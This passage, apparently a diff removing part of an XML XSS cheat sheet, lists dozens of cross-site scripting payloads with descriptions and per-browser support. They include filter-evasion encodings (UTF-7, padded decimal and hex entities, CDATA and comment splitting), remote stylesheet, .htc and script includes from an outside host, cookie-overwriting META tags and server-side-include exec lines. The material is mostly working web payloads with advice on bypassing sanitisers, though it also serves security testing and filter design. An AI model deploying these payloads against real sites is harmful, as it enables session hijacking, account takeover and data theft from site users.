-		<name>STYLE w/Anonymous HTML</name>
-		<code>&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;</code>
-		<desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don&apos;t really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>STYLE w/background-image</name>
-		<code>&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</code>
-
-		<desc>STYLE tag using background-image.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>STYLE w/background</name>
-		<code>&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;</code>
-
-		<desc>STYLE tag using background.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Stylesheet</name>
-		<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>Stylesheet</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Remote Stylesheet 1</name>
-		<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;</code>
-		<desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode.  Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won&apos;t work unless there is some content on the page other than the vector itself, so you&apos;ll need to add a single letter to the page to make it work if it&apos;s an otherwise blank page.</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Remote Stylesheet 2</name>
-		<code>&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;</code>
-		<desc>Remote style sheet part 2 (this works the same as above, but uses a &lt;STYLE&gt; tag instead of a &lt;LINK&gt; tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html.  As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it.  This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Remote Stylesheet 3</name>
-		<code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
-		<desc>Remote style sheet part 3. This only works in Opera but is fairly tricky.  Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera).  The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: &lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Remote Stylesheet 4</name>
-		<code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
-		<desc>Remote style sheet part 4.  This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>TABLE</name>
-		<code>&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;</code>
-		<desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>TD</name>
-		<code>&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;</code>
-		<desc>TD background.</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>XML namespace</name>
-		<code>&lt;HTML xmlns:xss&gt;
-&lt;?import namespace=&quot;xss&quot; implementation=&quot;http://ha.ckers.org/xss.htc&quot;&gt;
-&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;
-
-&lt;/HTML&gt;</code>
-		<desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>XML data island w/CDATA</name>
-		<code>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
-
-&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;</code>
-		<desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>XML data island w/comment</name>
-		<code>&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
-
-&lt;SPAN DATASRC=&quot;#xss&quot; DATAFLD=&quot;B&quot; DATAFORMATAS=&quot;HTML&quot;&gt;&lt;/SPAN&gt;</code>
-		<desc>XML data island with comment obfuscation (doesn&apos;t use CDATA fields, but rather uses comments to break up the javascript directive)</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>XML (locally hosted)</name>
-		<code>&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
-&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;</code>
-
-		<desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>XML HTML+TIME</name>
-		<code>&lt;HTML&gt;&lt;BODY&gt;
-&lt;?xml:namespace prefix=&quot;t&quot; ns=&quot;urn:schemas-microsoft-com:time&quot;&gt;
-
-&lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;
-&lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt; &lt;/BODY&gt;&lt;/HTML&gt;</code>
-
-		<desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Commented-out Block</name>
-		<code>&lt;!--[if gte IE 4]&gt;
-&lt;SCRIPT&gt;alert(&apos;XSS&apos;);&lt;/SCRIPT&gt;
-&lt;![endif]--&gt;</code>
-
-		<desc>Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode).  Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless.  As we can see, that probably wouldn't do the job.</desc>
-		<label>Other Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Cookie Manipulation</name>
-		<code>&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;</code>
-
-		<desc>Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where &lt;META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim&apos;s cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc).</desc>
-		<label>Other Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Local .htc file</name>
-		<code>&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;</code>
-		<desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc>
-		<label>Other Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Rename .js to .jpg</name>
-		<code>&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</code>
-		<desc>Assuming you can only fit in a few characters and it filters against &quot;.js&quot; you can rename your JavaScript file to an image as an XSS vector.</desc>
-
-		<label>Other Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>SSI</name>
-		<code>&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;</code>
-
-		<desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector.  I probably don&apos;t need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc>
-		<label>Other Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>PHP</name>
-		<code>&lt;? echo(&apos;&lt;SCR)&apos;;
-echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
-
-		<desc>PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.</desc>
-		<label>Other Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>JavaScript Includes</name>
-		<code>&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;</code>
-		<desc>&amp;JavaScript includes (works in Netscape 4.x).</desc>
-		<label>Other Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Character Encoding Example</name>
-		<code>&lt;
-%3C
-&amp;lt
-&amp;lt;
-&amp;LT
-&amp;LT;
-&amp;#60
-&amp;#060
-&amp;#0060
-
-&amp;#00060
-&amp;#000060
-&amp;#0000060
-&amp;#60;
-&amp;#060;
-&amp;#0060;
-&amp;#00060;
-&amp;#000060;
-&amp;#0000060;
-&amp;#x3c
-&amp;#x03c
-&amp;#x003c
-&amp;#x0003c
-&amp;#x00003c
-&amp;#x000003c
-&amp;#x3c;
-&amp;#x03c;
-
-&amp;#x003c;
-&amp;#x0003c;
-&amp;#x00003c;
-&amp;#x000003c;
-&amp;#X3c
-&amp;#X03c
-&amp;#X003c
-&amp;#X0003c
-&amp;#X00003c
-&amp;#X000003c
-&amp;#X3c;
-&amp;#X03c;
-&amp;#X003c;
-&amp;#X0003c;
-&amp;#X00003c;
-&amp;#X000003c;
-&amp;#x3C
-
-&amp;#x03C
-&amp;#x003C
-&amp;#x0003C
-&amp;#x00003C
-&amp;#x000003C
-&amp;#x3C;
-&amp;#x03C;
-&amp;#x003C;
-&amp;#x0003C;
-&amp;#x00003C;
-&amp;#x000003C;
-&amp;#X3C
-&amp;#X03C
-&amp;#X003C
-&amp;#X0003C
-&amp;#X00003C
-&amp;#X000003C
-
-&amp;#X3C;
-&amp;#X03C;
-&amp;#X003C;
-&amp;#X0003C;
-&amp;#X00003C;
-&amp;#X000003C;
-\x3c
-\x3C
-\u003c
-\u003C</code>
-		<desc>All of the possible combinations of the character &quot;&lt;&quot; in HTML and JavaScript.  Most of these won&apos;t render, but many of them can get rendered in certain circumstances (standards are great, aren&apos;t they?).</desc>
-		<label>Character Encoding Attacks</label>
-
-		<browser>Browser support:</browser>
-	</attack>
-	<attack>
-		<name>Case Insensitive</name>
-		<code>&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;</code>
-		<desc>Case insensitive XSS attack vector.</desc>
-
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>HTML Entities</name>
-		<code>&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;</code>
-		<desc>HTML entities (the semicolons are required for this to work).</desc>
-		<label>Character Encoding Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Grave Accents</name>
-		<code>&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;</code>
-		<desc>Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don&apos;t know about grave accents).</desc>
-
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Image w/CharCode</name>
-		<code>&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;</code>
-		<desc>If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need.</desc>
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>UTF-8 Unicode Encoding</name>
-		<code>&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;</code>
-
-		<desc>UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).</desc>
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Long UTF-8 Unicode w/out Semicolons</name>
-		<code>&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</code>
-
-		<desc>Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&amp;#XX;", since most people don&apos;t know about padding - up to 7 numeric characters total).  This is also useful against people who decode against strings like $tmp_string =~ s/.*\&amp;#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I&apos;ve seen this in the wild).</desc>
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>DIV w/Unicode</name>
-		<code>&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;</code>
-		<desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter).  The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc>
-		<label>Character Encoding Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Hex Encoding w/out Semicolons</name>
-		<code>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</code>
-
-		<desc>Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&amp;#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).</desc>
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>UTF-7 Encoding</name>
-		<code>&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-</code>
-
-		<desc>UTF-7 encoding - if the page that the XSS resides on doesn&apos;t provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don&apos;t need the charset statement if the user&apos;s browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire  http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google&apos;s custom 404 script.</desc>
-		<label>Character Encoding Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
